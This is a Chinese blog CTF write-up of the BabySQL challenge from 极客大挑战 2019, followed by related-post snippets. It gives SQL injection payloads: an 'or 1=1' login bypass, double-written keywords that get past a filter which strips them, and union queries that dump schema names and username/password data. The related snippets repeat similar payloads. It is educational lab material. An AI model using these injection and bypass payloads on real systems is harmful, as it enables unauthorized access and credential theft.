[极客大挑战 2019]BabySQL

最新推荐文章于 2024-09-02 14:48:18 发布
最新推荐文章于 2024-09-02 14:48:18 发布
阅读量56 收藏
点赞数
文章标签: mysql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55771794/article/details/118765119
版权

首先我们尝试一下万能密码,看看能够得到什么

admin' or 1=1 #

试一试注释掉密码之后的内容,登录成功

 

查一下有多少列

admin'  order by 3#

从结果发现order变成了der 可以判断对于‘or’进行了过滤

我们使用双写绕过,令or变为oorr,即中间被过滤后,前后拼接为想要的

admin'  oorrder bbyy 3 #

 登录成功,一共有三列,看一下回显位

aadmin'  uniunionon selselectect 1,2,3 #

查库

查表

aadmin'  uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database() #

 

查字段

adadas' uniunionon selselectect 11,22,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #

查字段信息

1' uniunionon selselectect 11,22,group_concat(username,passwoorrd) frfromom geek.b4bsql #

ookk

总结 

这次是依然是比较简单的一道题,最为重要的是发现有过滤,且知道双写绕过,这样的话这道题就不足为虑了!

Tang_y1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web-[极客挑战 2019]BabySQL
wojiushilsy的博客
05-13 313
题目要点题目内容解题1.查询数据库2.查询表名3.查询字段名4.查询数据 题目要点 双写绕过:waf将关键字替换为空。 题目内容 解题 1.查询数据库 /check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23 结果 Hello 2! Your.
极客挑战2019babysql
kindyyy的博客
04-08 1444
我也是参考了大佬的wp才会做的题目..... 大佬博客:[极客挑战 2019]BabySQL - 云千 - 博客园 (对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双写绕过。 大概就是这样。先看题目吧: ...
极客挑战 2019BabySQL(手动sql注入)
4pri1
02-06 905
[极客挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧 [极客挑战 2019]BabySQL(手动sql注入) [极客挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧 试一下万能密码 本来打算直接抓包的,看到一位师傅,直接给双写绕过了,试了试果然有用(还把+给过滤了1=1–+用不了了) 接下来和原来的操作基本一样,继续手动注入【别忘了双写绕过!】 按照2019lovesql那个的完全一样,再试一遍 用order by或者union .
[极客挑战 2019]BabySQL 1 详细题解
偷一个月亮
09-01 6009
过滤 select or and union from http://6d3700e3-2a8a-4291-9f0b-67e729cae0a1.node3.buuoj.cn/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=datab...
【学习笔记 27】 buu [极客挑战 2019]BabySQL
weixin_43553654的博客
07-28 208
0x00 知识点 union injection(联合注入) 双写注入绕过 0x01 知识点详解 1. 什么是union injection(联合注入)? 答:详情请查看我的第23篇学习笔记 2.什么是双写绕过? 答:这里推测是利用replace函数将检索到第一个关键词替换为空格,但是当我们重复书写后就可以绕过。例如:我们可以将union替换为ununionion来进行绕过。 0x02 解题思路 登录网站查看网站 看这个网站有点像之前做的那道lovesql那道题,再加上名字,不用想,肯定是注入了。先
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1433
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
[极客挑战 2019]BabySQL 1(双写绕过)
weixin_45253573的博客
12-08 1560
存在sql注入漏洞 username:1’ order by 2# password:1 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘der 2#’ and password='1’’ at line 1 or被过滤 username:1’ union select ..
[极客挑战 2019]BabySQL 1
09-03
BabySQL 1 是一道出现在极客挑战 2019 的题目,是一个 SQL 注入的题目。在这道题中,你需要通过注入来绕过对输入参数的限制,从而获取到所需的数据。 请注意,这里只是简单介绍了题目的基本情况,具体的题目内容...
MySQL数据库增删查改(基础)CRUD
chendemingxxx的博客
09-02 795
比如说:创建一张学生表,有姓名,学号。插入两个学生。可能有点草率看看例子: 顺序不是问题,后面参数和前面括号参数对等就行。比如说上面的例子:把id和name参数倒过来了,后面参数一一对应也可以。不推荐使用全列查询原因:比如说上面例子我只要id或者说只要name;当然也可以查询多个列: 比如说我们创建一个这样的表命令:第一个 效果:第三个总分效果:拓展一个现象: 拓展:语法:比较运算符:逻辑运算符:解释:%在mysql这里代表的是多个任意字符,_代表的是 一个任意字符。揭晓来才是修改硬盘里面的内容。案例:
mysql-day02
m0_64370841的博客
08-29 2233
【代码】mysql-day02。
MySQL 函数、约束、多表查询与事务详解
A_cot的博客
08-30 1658
MySQL 数据库中,函数、约束、多表查询和事务是非常重要的概念,它们可以帮助我们更好地管理和操作数据。本文将详细介绍这些概念,并通过代码演示来帮助你更好地理解。
MySQL——多表操作(四)子查询(5)带比较运算符的子查询
PAP
08-28 1342
MySQL——子查询(5)带比较运算符的子查询
MySQL空间函数ST_Distance_Sphere()的使用
程序人生
08-29 1266
MySQL提供了一系列的空间函数,其中ST_Distance_Sphere()函数可以计算两个经纬度坐标之间的距离,返回单位为米的浮点数。这个函数使用的是球形大地模型,因此对于较短的距离,计算结果的精度比较高。注意,在使用ST_Distance_Sphere()函数时,参数必须是经度和纬度的点对象。函数来创建表示经纬度坐标的点对象,然后将这两个点作为参数传递给。这个函数会计算这两个点之间的距离,并将结果作为。在上面的SQL中,我们将经度和纬度的值作为参数传递给。函数,然后将返回的点对象作为参数传递给。
MySQL系列—7.内存结构
最新发布
md54333的博客
09-02 498
对于聚集索引页,DML操作带来的数据磁盘读取和缓存修改往往是顺序的、集中的,这就很好 地利用了聚集索引的优点,但随着聚集索引页的顺序IO,各个二级索引页的读取和修改通常是随 机IO的。而Change buffer将分散的、未缓存的二级索引页的变化进行缓存而非直接从磁盘中读 取索引页,待到其他操作需要访问二级索引时,只需将change buffer中的变化缓存合并然后加 入缓冲池(buffer pool)就行了,这样就大大地减少了磁盘随机读取的IO。可以控制change buffer只对部分类操作生效。
MySQL5.7.36之主从复制延迟复制-centos7
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
08-31 623
MySQL5.7.36之主从复制延迟复制-centos7
MySQL 使用C语言链接
JK01WYX的博客
09-02 1292
mysql_get_client_info() ; msql_real_connect() ; mysql_query() ; mysql_store_result() ; mysql_num_rows() ; mysql_num_fields() ; mysql_fetch_fields() ; mysql_fetch_fields() ; mysql_close()
docker里装mysql
m0_74744788的博客
08-31 282
: 你已经将容器的 3306 端口映射到宿主机的 3306 端口,这是正确的配置,允许你从宿主机访问 MySQL 服务。-v mysql:/var/lib/mysql 挂载点。--name mysql 容器名字。dd3b2a5dcb48 镜像id。拉取mysql镜像后。
[极客挑战 2019]babysql
03-16
"极客挑战 2019" 的 "babysql" 是一道 SQL 注入漏洞题目。题目要求通过提交带有恶意代码的 SQL 查询,绕过网站的验证机制并获取敏感信息。解决这道题目的关键在于对 SQL 注入的理解和利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值